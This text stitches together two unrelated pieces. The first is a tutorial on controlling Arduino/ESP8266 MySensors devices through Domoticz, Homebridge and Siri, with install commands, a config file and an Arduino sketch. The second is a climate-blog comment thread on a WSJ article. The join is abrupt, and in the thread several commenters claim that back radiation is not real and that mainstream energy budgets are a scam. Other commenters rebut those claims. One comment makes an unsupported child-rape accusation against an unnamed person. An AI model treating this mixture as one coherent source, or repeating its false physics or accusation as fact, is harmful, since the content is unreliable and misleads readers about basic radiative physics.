If you have built your own connected objects based on Arduino (or ESP8266) and the MySensors library, here is how to drive them by voice with Siri or from the new Home app (HomeKit) in iOS 10. In this first tutorial, we will install and configure Homebridge with Domoticz. Contents - 1 Required configuration - 2 Install and configure Homebridge for Domoticz - 3 Adding a MySensors object under Domoticz - 4 Configure the Home app on iPhone or iPad - 5 Does it work outside my home? - 6 Control your Domoticz devices by voice with Siri Required configuration To follow this tutorial you will need the following items. A Raspberry Pi 3 (or 2) with Domoticz installed and configured. If you are new to home automation or Domoticz, here is a series of articles to help you (in French at the moment!): - Installation et configuration de Domoticz sur Raspberry Pi 2 ou 3 - Installer Domoticz sur Raspberry Pi et la distribution Raspbian Jessie A MySensors gateway. For this tutorial, I used a network gateway based on an ESP8266. You can start with this How To post (in French) to build a network gateway. At the time of writing, version 2 of the MySensors library is not yet officially supported by Domoticz, but it works very well. An iPhone running iOS 9 or iOS 10. For this article I used an iPhone 6s under iOS 10. Install and configure Homebridge for Domoticz Homebridge is an Open Source project developed by Nick Farina (GitHub, website). Homebridge is modular: plugins can be added depending on the hardware you want to expose to the iPhone (or iPad). There are already more than 260 of them (the list here). There are plugins for the leading home automation software (Domoticz, Home Assistant, OpenHAB, Jeedom, FHEM…) and for many devices (Philips Hue bulbs, Synology NAS). To install and configure Homebridge, I advise you to follow this tutorial. I ran into difficulties configuring it with Domoticz when following the official tutorial (even though the procedure ends up being similar). 
Before you begin, make sure your system is up to date:
sudo apt-get update
sudo apt-get upgrade
If you installed Domoticz from the official image, first expand the partition so that it uses all of the space on the SD card. Run sudo raspi-config, choose Option 1 – Expand Filesystem, then Finish and finally allow the reboot. Install Node.js Before installing Homebridge, you need to install Node.js. Follow the steps that correspond to your Raspberry Pi model. Raspberry Pi A/B/B+ (older models):
sudo apt-get remove nodejs
sudo rm -rf /usr/local/{lib/node{,/.npm,_modules},bin,share/man}/{npm*,node*,man1/node*} /var/db/receipts/org.nodejs.*
hash -r
wget https://nodejs.org/dist/v6.3.1/node-v6.3.1-linux-armv6l.tar.gz
tar -xvf node-v6.3.1-linux-armv6l.tar.gz
cd node-v6.3.1-linux-armv6l
sudo cp -R * /usr/local/
cd ~/
Raspberry Pi 2 or 3:
sudo apt-get remove nodejs
sudo rm -rf /usr/local/{lib/node{,/.npm,_modules},bin,share/man}/{npm*,node*,man1/node*} /var/db/receipts/org.nodejs.*
hash -r
wget https://nodejs.org/dist/v6.3.1/node-v6.3.1-linux-armv7l.tar.gz
tar -xvf node-v6.3.1-linux-armv7l.tar.gz
cd node-v6.3.1-linux-armv7l
sudo cp -R * /usr/local/
cd ~/
Install Homebridge and eDomoticz Now we can install Homebridge and the Domoticz plugin:
sudo npm set prefix '/usr' -g
sudo npm update -g homebridge --unsafe-perm
sudo npm update -g homebridge-edomoticz --unsafe-perm
sudo apt-get install libavahi-compat-libdnssd-dev
A few explanations for those who do not know npm: - -g installs the package globally. Without -g, the package is only usable from its installation directory; with it, everything goes into npm's global directory where other packages can use it. - --unsafe-perm lets the installation proceed past permission-related error messages. Get the MAC address of your Raspberry Pi. It is undocumented, but without this configuration (trick found here) you may not be able to detect the Homebridge bridge from the iPhone (or iPad). Run ifconfig; the MAC address of the Pi is on the right, after HWaddr. 
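Homebridge's config.json expects this MAC address, in uppercase, as the bridge "username". A minimal Python sketch of normalizing the value read from ifconfig; the helper name is mine, not part of Homebridge:

```python
def format_mac(raw: str) -> str:
    """Normalize a MAC address for Homebridge's config.json "username" field.

    Hypothetical helper: Homebridge wants uppercase, colon-separated hex,
    so we uppercase and accept dash-separated input too.
    """
    mac = raw.strip().replace("-", ":").upper()
    parts = mac.split(":")
    if len(parts) != 6 or any(len(p) != 2 for p in parts):
        raise ValueError("not a MAC address: %r" % raw)
    return mac

print(format_mac("b8:27:eb:4f:12:9a"))  # → B8:27:EB:4F:12:9A
```

Pasting the lowercase value straight from ifconfig is exactly the mistake the tutorial warns about, since a lowercase MAC stops Homebridge.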
Now create a folder for Homebridge: mkdir ~/.homebridge Then open the configuration file in a text editor (pico or nano): sudo nano ~/.homebridge/config.json Paste this default configuration as a basis for an existing Domoticz server. Change the value of the username key by entering the MAC address of the Raspberry Pi. Warning: you must enter the MAC address in uppercase, otherwise it will cause an error and stop Homebridge. You can use this to assign your PIN code.
{
  "bridge": {
    "name": "Homebridge",
    "username": "ADRESSE_MAC_PI",
    "port": 51826,
    "pin": "031-45-154"
  },
  "description": "Configuration file for (e)xtended Domoticz platform.",
  "platforms": [
    {
      "platform": "eDomoticz",
      "name": "eDomoticz",
      "server": "127.0.0.1",
      "port": "8080",
      "ssl": 0,
      "roomid": 0,
      "mqttenable": 1,
      "mqttserver": "127.0.0.1",
      "mqttport": "1883",
      "mqttauth": 0,
      "mqttuser": "",
      "mqttpass": ""
    }
  ],
  "accessories": []
}
Save with CTRL + X, then Y. Now run Homebridge: sudo homebridge Adding a MySensors object under Domoticz For the purposes of this tutorial, I prepared a small connected object composed of a contact switch and an LED to simulate turning a lamp on and off. The LED could very easily be replaced by a relay to control a lamp or the opening of an electric gate, for example. To build this assembly, you will need the following items: - 1x ESP8266 ESP-12F, for example a Wemos D1 Mini - 1x LED - 1x 220 Ω resistor - 1x reed switch - 1x nRF24L01+ radio module - 1x nRF24L01+ adapter plate (optional but recommended) - 1x breadboard (optional) - some Dupont jumpers Circuit The nRF24L01+ radio module must be powered at 3.3 V. The 3.3 V supply on some boards is mediocre; it is better to use an adapter plate, which has a better voltage regulator. Code With version 2 of MySensors, it is possible to attach one (or more) sensor nodes to a gateway. 
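A quick way to catch a JSON typo or the uppercase-MAC mistake before launching Homebridge is simply to parse the file. A small sketch; the checks below mirror the warnings in this tutorial and are not part of Homebridge itself:

```python
import json

# Trimmed copy of the config shown above (MAC value is a placeholder example).
config_text = """
{ "bridge": { "name": "Homebridge", "username": "B8:27:EB:4F:12:9A",
              "port": 51826, "pin": "031-45-154" },
  "platforms": [ { "platform": "eDomoticz", "name": "eDomoticz",
                   "server": "127.0.0.1", "port": "8080" } ],
  "accessories": [] }
"""

config = json.loads(config_text)          # fails loudly on a JSON syntax error
bridge = config["bridge"]
assert bridge["username"] == bridge["username"].upper(), \
    "MAC address must be uppercase or Homebridge will stop"
assert len(bridge["pin"]) == 10           # HomeKit PIN shape: XXX-XX-XXX
print("config OK:", bridge["name"])
```

Running `python3 -c 'import json; json.load(open(".homebridge/config.json"))'` on the Pi gives the same syntax check against the real file.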
Here is the code for an ESP8266 WiFi gateway which reports the state of a contact (to detect the opening of a door, for example) and simulates a lamp by turning an LED on and off. Before uploading the code to your ESP8266, change the following parameters: - MY_ESP8266_SSID: the name of the WiFi network - MY_ESP8266_PASSWORD: its password - MY_IP_ADDRESS: it is best to give the gateway a static IP address - MY_IP_GATEWAY_ADDRESS and the subnet, to match your router
/**
 * ESP8266 WiFi gateway with a local door contact and LED
 */
#define MY_GATEWAY_ESP8266
#define MY_ESP8266_SSID "SSID"
#define MY_ESP8266_PASSWORD "PASSWORD"
// Enable UDP communication
//#define MY_USE_UDP
// Set a static IP address here if you do not want DHCP
//#define MY_IP_ADDRESS 192,168,178,87
// If using static ip you need the gateway and subnet as well
//#define MY_IP_GATEWAY_ADDRESS 192,168,178,1
//#define MY_IP_SUBNET_ADDRESS 255,255,255,0
// Controller ip address. Enables client mode (default is "server" mode).
// Also enable this if MY_USE_UDP is used and you want sensor data sent somewhere.
//#define MY_CONTROLLER_IP_ADDRESS 192, 168, 178, 68
#ifdef MY_USE_UDP
#include <WiFiUdp.h>
#else
#include <ESP8266WiFi.h>
#endif
#include <MySensors.h>
#define CHILD_ID_CONTACTEUR 0
#define CHILD_ID_LED 1
#define CHILD_ID_LEVELBAT 2
#define CONTACTEUR_PIN D3 // Pin the contact switch is attached to
#define LED_PIN D1        // Pin driving the actuator (LED, relay...)
#define LED_ON LOW        // not shown in the original listing; values assumed for an active-low LED
#define LED_OFF HIGH
#define FREQ_ENVOI 10000 // Force a state report at least every 10 s
boolean etatPrecedent = false;
unsigned long dernierEnvoi = 0;
MyMessage msgContacteur(CHILD_ID_CONTACTEUR, V_TRIPPED);
MyMessage msgLed(CHILD_ID_LED, V_LIGHT);

void setup() {
  pinMode(CONTACTEUR_PIN, INPUT);
  pinMode(LED_PIN, OUTPUT);
  digitalWrite(CONTACTEUR_PIN, HIGH);
  digitalWrite(LED_PIN, HIGH);
}

void presentation() {
  // Send the sketch version information to the gateway and controller
  sendSketchInfo("Gateway MySensors v2", "1.0");
  // Register all sensors to the gateway (they will be created as child devices)
  present(CHILD_ID_CONTACTEUR, S_DOOR);
  present(CHILD_ID_LED, S_LIGHT);
}

void loop() {
  uint8_t etat;
  unsigned long tempsActuel = millis();
  // Read the contact state
  etat = digitalRead(CONTACTEUR_PIN); // == LOW;
  if (etat != etatPrecedent || (tempsActuel - dernierEnvoi > FREQ_ENVOI)) {
    etatPrecedent = etat;
    dernierEnvoi = tempsActuel;
    Serial.print("Contact state changed: ");
    Serial.println(etat ? "Open" : "Closed");
    send(msgContacteur.set(etat ? "1" : "0"));
  }
  delay(5);
}

void receive(const MyMessage &message) {
  // We only expect one type of message from the controller, but check anyway.
  if (message.isAck()) {
    Serial.println("This is an ack from gateway");
  }
  if (message.type == V_LIGHT) {
    // Change the relay/LED state
    bool state = message.getBool();
    digitalWrite(LED_PIN, state ? LED_OFF : LED_ON);
    // Store state in eeprom
    saveState(CHILD_ID_LED, state);
    // Write some debug info
    Serial.print("Incoming change for sensor:");
    Serial.print(message.sensor);
    Serial.print(", New status: ");
    Serial.println(message.getBool());
  }
}
Configuration of the devices under Domoticz To learn how to add a MySensors object under Domoticz, follow this tutorial (in French); otherwise, here are the steps in accelerated form. Add a MySensors Gateway with LAN interface in Setup -> Hardware. Specify the IP address of the gateway and the port. Give it a name, then Add. 
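The loop's reporting rule (send when the contact changes state, and in any case at least every FREQ_ENVOI milliseconds) can be sketched in Python to see which iterations actually transmit. Function and variable names here are mine, not from the sketch:

```python
FREQ_ENVOI = 10000  # heartbeat period in ms, same value as in the sketch

def should_send(state, prev_state, now_ms, last_sent_ms):
    """Mirror of the sketch's condition: report on a state change,
    or when more than FREQ_ENVOI ms have passed since the last report."""
    return state != prev_state or (now_ms - last_sent_ms) > FREQ_ENVOI

# A door that opens at t=3000 ms and then stays open:
events = [(0, 0), (3000, 1), (5000, 1), (14000, 1)]
prev, last = 0, 0
sent = []
for t, s in events:
    if should_send(s, prev, t, last):
        sent.append(t)            # this iteration would call send(...)
        prev, last = s, t
print(sent)  # → [3000, 14000]
```

The change at t=3000 triggers an immediate report; the t=14000 report fires only because the 10 s heartbeat has elapsed, which is what keeps Domoticz in sync even if a radio message is lost.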
Add the devices from Setup -> Devices: press the green arrow in front of each device to add it, and type a name for the device. After adding, the arrow turns blue. Go to the Switches tab and change the device types if necessary. Now restart Homebridge so that the devices become visible to iOS. Configure the Home app on iPhone or iPad On your iPhone or iPad (preferably under at least iOS 10), launch the Home app. Your iPhone (or iPad) must be connected to the local network over WiFi to be able to add a bridge and accessories. Tap Add Accessory. Include in Favorites: include all the accessories that you want to find in the lock screen's notification center. Assign a room: assigning a room to each accessory makes it easier to control it by voice with Siri. It is enough to say "turn on the living room" or "turn off the light in the living room…" That's it! You can also look at the icons of active accessories. Lock your iPhone and open the notification center; swipe the panel to the right twice to access the control panel for the Home favorites. Does it work outside my home? Here is the main benefit of using the Home (HomeKit) app of iOS 10: you do not need to expose your home automation server to the internet. iOS (HomeKit) and Apple's servers, via your iCloud account, take care of everything, and in a secure way. But to make it work, you need HomeKit-compatible hardware at home, and it must be turned on (...and charged). Here is what you can do depending on your hardware (see this Apple page to learn more): - to control accessories remotely: a 3rd generation Apple TV (it is not possible to access HomeKit surveillance cameras), or a 4th generation Apple TV running tvOS 9.0 or higher - to set up automations and user permissions: a 4th generation Apple TV under tvOS 10, or an iPad running iOS 10 In summary, you will need a fairly recent iPad (an iPad Air, for example) or a 4th generation Apple TV to be able to create simple scenarios. 
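Under the hood, the eDomoticz plugin drives your switches through Domoticz's JSON API on the server and port configured in config.json. A minimal sketch of the kind of request involved when Siri flips a light; the idx value is hypothetical, and no request is actually sent here:

```python
from urllib.parse import urlencode

DOMOTICZ = "http://127.0.0.1:8080"  # server/port from the config above

def switch_url(idx: int, on: bool) -> str:
    """Build the Domoticz JSON API call that toggles a switch with the
    given device idx (the same style of call the plugin issues)."""
    query = urlencode({
        "type": "command",
        "param": "switchlight",
        "idx": idx,
        "switchcmd": "On" if on else "Off",
    })
    return f"{DOMOTICZ}/json.htm?{query}"

print(switch_url(12, True))
# e.g. http://127.0.0.1:8080/json.htm?type=command&param=switchlight&idx=12&switchcmd=On
```

Opening such a URL in a browser on the Pi is a handy way to check that Domoticz itself reacts before blaming Homebridge or HomeKit.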
When you use Home away from home, it takes a few seconds for HomeKit to re-establish the connection with the hardware playing the role of hub (the HomeKit hub). The 3rd generation Apple TV is still usable, but the features are more limited (no home automation cameras, no automations, no user management). Problems outside the home? Do not expect an immediate response to your actions when your iPhone is no longer connected over WiFi to Domoticz (or to any HomeKit-certified device). It takes some time for the action to reach iCloud and then come back down to the iPad or Apple TV in your home. Even if iCloud has made big progress in terms of reliability and performance, there is a latency which may also come from your 4G (or 3G) connection. Let's say that a delay of a few seconds is not unusual. Another finding: the status of accessories is not updated in real time in the notification center. For example, if a switch reports the opening of a door, the corresponding icon will not light up. The status of an accessory is only refreshed when the panel is displayed, or during a manual action from the panel. One last point: Homebridge is a "borderline" project. It is not a certified Apple product. We stay in DIY territory; it works very well, but from time to time… Control your Domoticz devices by voice with Siri Now that everything works in Home, it is time to test voice commands with Siri. Try to turn on the light in the living room: "Hey Siri, turn on the light in the living room". Similarly, to turn it off, say "turn off the light in the living room". Finally, ask Siri whether the door is closed: "Hey Siri, is the door open?" List of commands that work with Siri, and advice So that Siri is able to make the link with the Domoticz accessory, name it exactly by its designation. Rather than putting the room into the accessory's name, it is best to assign a room to each accessory; it makes the connection easier for Siri. 
For example, rather than naming an accessory "living room light", name it "light" and create a room called "living room"; otherwise, asking for "the living room light" may not work. If you have many accessories, standardize your designations, or prepare for a headache trying to remember the name given to the lamp in the attic ;-). Under iOS 10, here is a list of actions that you can perform by voice with Siri (from this list): You can also create and trigger scenes. To trigger one, simply say its name, for example "Hey Siri, Hello". To create a scene, go to the rooms, press the plus, then Add a scene. There are already suggested scenes in the list. Finish the configuration, for example a Hello scene to turn on all the lights in the living room. It's ready. Homebridge is a large, community-supported Open Source project. Its very open architecture has allowed third parties to develop many plugins. The eDomoticz plugin is very complete and responsive for actuators: turning a lamp on or off responds instantly. Updating the state of a contact takes longer; it is not uncommon to wait almost a minute. On the iOS side, the Home app is very simple and intuitive. You can even drive your installation from your iPhone outside the house without having to make your Raspberry Pi reachable from the internet, which is a real guarantee of security. On the scenario side, the Home app is much less advanced than home automation software, but the combination of the two solutions is really very smooth and pleasant to use.
https://diyprojects.io/homebridge-domoticz-fly-mysensors-objects-siri-ios10/
Sept. 4, 2014 7:20 p.m. ET. 177 thoughts on “Matt Ridley in the WSJ: Whatever Happened to Global Warming?” Please form a neat orderly queue at the humble pie counter. wsj.com allows comments. My favorite was: “Global warming is caused by the desire for more tax money.” It’s nice that it’s in the WSJ, but the WSJ doesn’t make policy. The unelected EPA gets free reign to do whatever it pleases, and they want to pretend everything is worse than we thought. According to media gospel, California is the national leader on environmental regulation. If we defund the federal EPA, then California and other states can still choose to be the national leader in environmental regulation, or they could choose to lead from behind. The federal EPA could be said to have already abused its authority, and as a consequence it could in coming months see its funding reduced; the more the EPA abuses its authority, the greater the chance its budget is cut or the agency is eliminated entirely. It also seems likely that further EPA abuses of its authority, and the resulting possibility that the agency is terminated, would cause a domino effect on other federal agencies that are also poorly serving the American public. I agree with your analysis, but I am not too worried about individual states continuing the EPA’s reign of terror. True, if the EPA is declawed, states could still issue draconian regulations. But if a state does so and its neighbors don’t, then that state will likely see the affected businesses move to one of those neighbors. Without the EPA issuing country-wide regulations, any state that does so on its own will likely see an exodus of jobs and population. ddpalmer, See California for an example. 
Before all the environmental zealotry, it had one of the largest economies in the world (#5 in the 80s); after all the zealotry, they have fallen greatly, still one of the largest, but moving well down the list (somewhere between #8 and #10 inclusive – they’ve been playing leap-frog with Italy and the Russian Federation). While their natural beauty and generally benign (if a bit dry) environment will keep them popular, many businesses will head for greener pastures as the regulations begin to make profitability impossible. The thing that is really crazy is that California’s government will take a modest idea that may do some good and turn it into a Frankenstein’s monster of regulations and penalties, and they do it EVERY TIME. Sacramento is a place where good ideas go to die. I really hope other states do not look to them as a positive example. LOL with Owen in GA September 5, 2014 at 6:16 am many businesses will head for greener pastures I, for one, would LOVE to see California continue its Reign of Environmental Terror! It won’t take much more incentive for the last few manufacturing plants left there to pack up and move to Texas – wait, here comes another one!!! Defunding the EPA is a great idea. Given that the Department of Education has a negative effect on K-12 education, it would be logical to defund that too. Then there is the Department of Agriculture, the Department of Energy……….the list goes on and on. Let’s keep the Department of Defense and increase its budget. What was that other department you want to get rid of, Governor Perry? Hmmmm. Oops. The WSJ is the number one read paper in the country. Decision makers do read this paper, maybe not lefties much. Free reign. Or free rein? Auto Only in Standard English. In 21st century American it can be rein, reign, rain, or rane. 
The next thing we will hear is “that’s what I always thought/suspected, so now it just goes to show I was right all along” (enter professor or pseudo-climate ‘scientist’ name here). Try not to list too many. Now can we start cutting the g$avy t$ain money, or do we need to redouble the grants to find out why and prevent global cooling? The AGW scientists, greens, environmentalists, charities, government leaders, pressure groups etc. who still like to use the ‘Global Warming’ and ‘Climate Change’ phrases to support their views, regardless of the emphatic and hard empirical evidence that abounds to the contrary, would be advised when discussing the weather, farming, health, animal species etc. to quietly drop the phrases from their everyday public language, as many of their colleagues have already done; otherwise they will increasingly become the laughing stock of the wider sceptic public, who have not seen any change in their living environment since the scare was first propagated over twenty years ago. Open a gap between Panama and South America :) Hey, it’s not like anyone is using the Darién Gap anyway. That or spew soot all over the ice as it forms over the Northwest Territories and Siberia. I totally agree. The laws of thermodynamics must be applied to this problem, not so-called radiative physics. This problem cannot be framed or defined in such terms, otherwise you end up with the nonsense that cold bodies can heat up warmer bodies, or water flowing uphill and the like. Anything’s possible in cartoons and climate models. And statistics, I suppose. I’m not disagreeing with you, but while cold bodies can’t heat up warmer bodies, they can slow down the cooling of the warmer body, which I think is the basis of the AGW hypothesis. It’s not that CO2 heats up the planet – it’s that CO2 putatively slows the cooling. 
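The point the last commenter makes about a colder body slowing, rather than reversing, net heat loss is just the textbook Stefan-Boltzmann exchange law: the net flux between two surfaces goes as σ(T_hot⁴ − T_cold⁴), which is positive from hot to cold and zero between equal temperatures. A quick numeric sketch, assuming idealized black surfaces, with temperatures chosen only for illustration:

```python
SIGMA = 5.670374419e-8  # Stefan-Boltzmann constant, W m^-2 K^-4

def net_flux(t_hot: float, t_cold: float) -> float:
    """Net radiative exchange between two ideal black surfaces (W/m^2).
    Positive means energy flows from the hot surface to the cold one."""
    return SIGMA * (t_hot**4 - t_cold**4)

# A 288 K surface facing a colder layer at 255 K: a net *loss* of ~150 W/m^2.
print(net_flux(288.0, 255.0))
# Warm the cold layer and the net loss shrinks -- the warm surface cools
# more slowly, but is never heated by the colder one:
print(net_flux(288.0, 270.0) < net_flux(288.0, 255.0))  # → True
print(net_flux(288.0, 288.0))                           # → 0.0
```

The net flux never goes negative toward the colder body, so nothing here violates the second law; the colder body only reduces the rate of loss.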
Personally, I think a moment’s reflection on the overwhelming heat transport of convection vs the relatively weak thermal properties of IR absorption/re-emission would have put this silly theory to rest. Others like me feel embarrassed whenever we see people unable to understand back radiation instead. So explain how back-radiation from the cold atmosphere adds net energy to the warmer surface! I have explained it very simply: an emittance (aka exitance) is a potential energy flux to a sink at absolute zero, not a real energy flux. This mistake, deeply embedded in atmospheric science, is ~50 years old and comes from Sagan, who, because he had made a humongous mistake in aerosol optical physics, thought he had proved Arrhenius’ claim of ‘black body’ surface emission from the Venusian surface. ‘Back radiation’ does not exist as a real flux. The Earth’s surface emits net IR at one sixth the black body level. There is zero surface IR emission in all self-absorbed GHG bands, including 15 micron CO2. Climate Alchemists have been taught incorrect physics. The textbooks have to be changed back to standard physics. Climate researchers need to be retained. All the literature needs to be junked. Do I make myself clear? phillipbratby, you ask; it doesn’t. Back-radiation from the cold atmosphere inhibits net energy loss from the warmer surface to very cold space. Your question displays a failure to understand what you are talking about. You could ask with equal validity, ‘So explain how coverage by a cold duvet adds net energy to your warmer body!’ Richard The back radiation scam is best explained in conjunction with the other major false claim, originating from 1981_Hansen_etal.pdf, of a single -18 deg.C OLR emitter. That in turn creates, in the two-stream approximation, a down flux = |OLR|. Met Office modellers spuriously justify this on the basis of Kirchhoff’s law of radiation by a radiative physics trick. There is no such zone. 
The end result is an energy budget of 238.5 W/m^2 thermalised SW + 333 W/m^2 ‘back radiation’ (reversing at the surface) – 238.5 W/m^2 = 333 W/m^2. This perpetual motion machine of the second kind creates 40% more energy than reality, used in conjunction with the false GHE = 33 K lapse rate warming, to justify increased latent heat. It’s a scam; the clever bit is how well it has been hidden by the modelling complexity and Sagan’s wrong aerosol physics (the sign of the AIE is reversed). As a non-science guy I don’t understand. So if you point a thermal camera at the underside of the duvet, does it look cold? Stephan That depends on what you mean by “look cold”. Everything is warmer than absolute zero. And I cannot help you here if you cannot understand that a duvet keeps you warm by inhibiting heat loss. Take an elementary course in primary school physics. Richard I was using your words, “a cold duvet”, so feel free to explain it how you mean it. I was asking what the camera sees when pointed at the inside of the duvet. stefan Please stop trying to pretend you are an idiot. I wrote clearly; in that statement the word “cold” means not as warm as “your warmer body”. Richard “As non-science guy I don’t understand. So if you point a thermal camera at the underside of the duvet, does it look cold?” Stefan, please read again what AlecM wrote. The answer is there. Sorry to waste your time. I’m not a warmer nor an idiot. I simply don’t know the jargon. Plain English would help us “non-science guys”. Thing is, if it can’t be put into plain English, how do you know your colleagues here who disagree know that they understand their own jargon either? AlecM “Climate researchers need to be retained.” Climate researchers need to be retrained. Fixed it for ya. No charge :) and people like me get embarrassed when people like you are somehow using bad physics to model CO2’s effect on climate. 
If your existing CO2 physics was correct we would not have the existing 17-year stop in climate warming; we would have an accelerating rate of climate warming. Something is wrong with your back radiation and other aspects of CO2 as a greenhouse gas !!! No, it merely shows that any “back” radiation received at the surface from an insulating blanket above has the effect of creating a slightly higher equilibrium temperature for all of the objects under the blanket, just as the First Law of thermodynamics would predict. Perfect equilibrium is never quite achieved, of course, but the Earth’s surface is warmer than it would be without its atmospheric ‘blanket’. I think all engineers and scientists would agree on that. The elephant in the room here is that H2O and aerosols, not CO2, dominate this effect and are the real agents responsible for climate change. Aerosols, unlike CO2, absorb incoming sunlight. Aerosols also contribute to albedo and reflect incoming sunlight, so they have cooling properties as well as warming ones. A more complex equation, which current climate models do not adequately address. The only “triumph” that the IPCC, and their MSM fellow travelers, can brag about is that they’ve succeeded in convincing virtually everyone, including many lukewarm skeptics, that manmade CO2 is the main culprit behind CAGW, a false notion. In reality it is a minor factor compared to H2O and aerosols. And water vapor is not a ‘greenhouse gas’ in the same way as CO2, which is a radiative gas. CO2, when given sufficient energy by collision with other atmospheric molecules (most likely N2), will emit that energy as an infrared photon in a random direction. If a CO2 molecule is hit by an IR photon of the right frequency it will start to vibrate and either almost immediately re-emit an IR photon (of a slightly different frequency) in a random direction, or, if a collision takes place before re-emitting the IR, pass the vibrational energy on to another atmospheric molecule, again most likely N2. 
Water holds heat as latent heat of phase change. So as cloud water molecules in droplets change phase to water vapor, they absorb the latent heat of vaporization but do not change temperature. Similarly, when an ice crystal melts to become a water droplet, its molecules absorb the latent heat of fusion and do not change temperature. Conflating water vapor and carbon dioxide as ‘greenhouse gases’ is not accurate, as their behavior is totally different. Ian W You are spouting rubbish. Both CO2 and H2O are radiative greenhouse gases. It is a function of their molecular shapes. Richard Ian W: H2O is indeed a GHG in the same way as CO2. Both are compound molecules composed of two different atoms, unlike N2 or O2 but like CH4 or NOx. Water and carbon dioxide gas even share some overlap in their absorption bands. There is no ‘back radiation’, defined as a real energy flux. It is a radiation field isolated by placing a solid shield behind the detector. That radiation field, its power over a multi-wavelength detector or the integral of the ‘Poynting vectors’ of individual wavelengths, is scaled with respect to the Planck Irradiation Function, the radiation field that he calculated would be emitted by a black body cavity emitter at a particular temperature. Only the vector sum of the opposing PIFs, called emittances or exitances, over the shared wavelength range, can do thermodynamic work. This is a result of Maxwell’s Equations. The real behaviour of the atmosphere is defined by self-absorption of the various GHG bands. For those who make statements about back radiation and its effect on surface temperature, and about how optically absorbing gases on a planet cause a temperature rise, see the following: If you don’t understand the analysis, please keep your uninformed comments to yourself. Yup; a good analysis. However, ‘back radiation’ is used by Climate Alchemists to claim feedback via the extra ‘forcing’ causing extra surface emittance. 
This is ludicrous, not even High School physics, because it leads to a 40% increase of energy from nowhere. The scintillation experiment shows the +/- 4x peaking individual amplitude for the thermal noise from various IR wavelengths. Increase IR ‘forcing’ and you get less net surface IR, so the surface has to warm up to increase convection and evaporation. Never in science have so many mistakes been made by so many, and the dumb politicians like Obama paid for it! Leonard laments: “If you don’t understand the analysis, please keep your uninformed comments to yourself.” Such dangerous arrogance is the first sign of quackery. How did the Sky Dragons sneak back in here? You know, the ones who coauthored a book with the registered child rapist who is an iron sun crackpot? Yeah, *those* guys are telling us to shut up because we don’t understand their mere technical word games that amount to pure nonsense, noted too by string theorist Motl. Iron sun guy is on Goddard’s blog this week, invoking the singular ancient god of the Egyptians to invoke the beauty of neutron repulsion, spiritual center of all life in the solar system. Al Gore is lovin’ it, giggling on his way to the bank. -=NikFromNYC=-, Ph.D. in chemistry (Columbia/Harvard) To NikFromNYC: don’t ever imagine that I am a dragonslayer. They asked me to join, but I prefer to be independent. If you claim you know physics, explain night-vision science. If the device measured the exitance of the source, the image would not shimmer back to zero amplitude. I have measured coupled convection and radiation for many decades and created process plant involving GHG heating and cooling. What I say goes, because otherwise those production plants would not work. The Climate Alchemists can blame Carl Sagan and Goody, who taught people like Lindzen incorrect physics. Any physicists who imagine exitance is a real energy flux need to go back to school. Only the vector sum of exitances at a plane gives the real net flux. 
I understand that the first sentence in the article linked to is wrong. Hence a straw man. As such, there is no need to read further. Your ignorance of the science is clear and I’ve got better things to do with my time. I’m guessing you don’t agree with this sentence (from the “Heat Transfer Handbook”): “All materials continuously emit and absorb electromagnetic waves, or photons, by changing their internal energy on a molecular level.” If you agree with that statement, you know how a cold body radiates energy to a warm body. If you think this violates the second law of thermodynamics, you don’t understand the second law. Enough about this. I’ll not respond further. NikFromNYC, I have rejected the Sky Dragons’ positions, not supported them. Please read my analysis, as it explains the physics of backradiation, its actual effects, and what actually causes the atmospheric greenhouse effect. Until you read it and have real comments specifically on the material, you are just as bad as the sky dragons. My comment was not arrogance; it was a response to the many comments made by people who do not understand the basic physics, and an appeal not to comment when you do not understand basic radiation physics. Sure, I don’t disagree with this. However, one obvious component of that net resistance between the surface and 3 K outer space is the radiative absorptivity of the atmosphere. Nobody I know seriously asserts that a single-layer model is a particularly good one, in the sense that it will lead to good quantitative agreement with atmospheric radiative warming, as it does indeed neglect things like active heat transport in convection and latent heat (which short-circuit some fraction of the “bare” absorptive resistance), the thermal lapse rate, and so on. That doesn’t in any way negate the statement that there is almost certainly a positive, nonzero derivative in the dynamical response of the climate to more CO_2. 
Nonlinear complex behavior could confound it (with difficulty), and the derivative could be small enough to be utterly lost in noise and natural processes, and it could be (and I think probably is) partially cancelled in the total derivative by negative feedbacks from other parts of the climate system, but it simply isn’t sensible to think that the “bare” linear response to more CO_2 is not increased average temperature. Beer-Lambert and almost any sensible model you like are going to predict a positive response, not a negative or neutral one. There is certainly nothing about this warming due to increased net resistance between surface and sink that violates the first or second law, however (an often-stated Slayer position), and at the end of the day one can simply look at the figures in Petty’s book “A First Course in Atmospheric Radiation”, which are direct observations of the greenhouse effect in action, fractionated by the lapsed temperature of the emitting layer per band in the relevant parts of the spectrum. I don’t know how anybody who understands electrodynamics could ever look at these graphs and not go hmm, yup, there is a greenhouse effect all right. The details of the many processes involved don’t make this good evidence that we should believe any of the “obvious” linearized single-layer models, and sadly computing a detailed solution is basically impossible by twenty or thirty orders of magnitude (where we have no particularly good reason to think that nonlinear partial differential systems will suddenly become computable for this most difficult problem in the history of nonlinear partial differential systems at the scales we can afford to reach). In truth, we are far, far more ignorant about the climate than we think we are. Beyond the obvious autocorrelation times of the short-range behavior, the one thing we learn about the climate from looking at its past (poorly known!) record is that it is not a stationary process. 
Modelling it with a stationary projective dynamical theory is just silly, and bound to fail. IMO. That means that we really don't know what the climate will do in response to increased CO_2, any more than we know what it would have done if CO_2 hadn't changed. But humans seem to really hate admitting that there is something that we don't know. rgb

I too have been scammed by almost-believable no-back-radiation arguments before now. Luckily, I remembered my basic physics just in time! It's just necessary to remember that EVERYTHING radiates ALL the time, regardless of whether or not it is colder or hotter than another body. That's the basic difference between radiative and conductive thermodynamics. AlecM is not confused – he just won't bloody listen!

To Uncle Gus and anyone else who has tried to take me on about basic physics. There is a serious problem with radiative heat transfer understanding. It comes from the earliest law of radiation, Prévost's theory of exchanges. Pierre Prévost in 1791 put forward the proposition that this was a continuous process, the net transfer between two bodies being the difference of the continuous fluxes, assumed to be at the S-B rate. This has confused generations of scientists. It's because it conflicts with Maxwell's laws. John Henry Poynting in 1884 worked out the concept of the Poynting vector; for a plane monochromatic wave this has a mean value of ε₀cE²/2, where ε₀ is the permittivity of free space, c the velocity of light and E the magnitude of the electric vector. Poynting vectors sum as vectors. Therefore if you have two equal temperature plates, insulated backs, in a vacuum, a short distance apart, on average there is zero net radiative flux. This is not the S-B flux from one plate to the other minus the same in the other direction, with equal numbers of 'photons' in different directions.
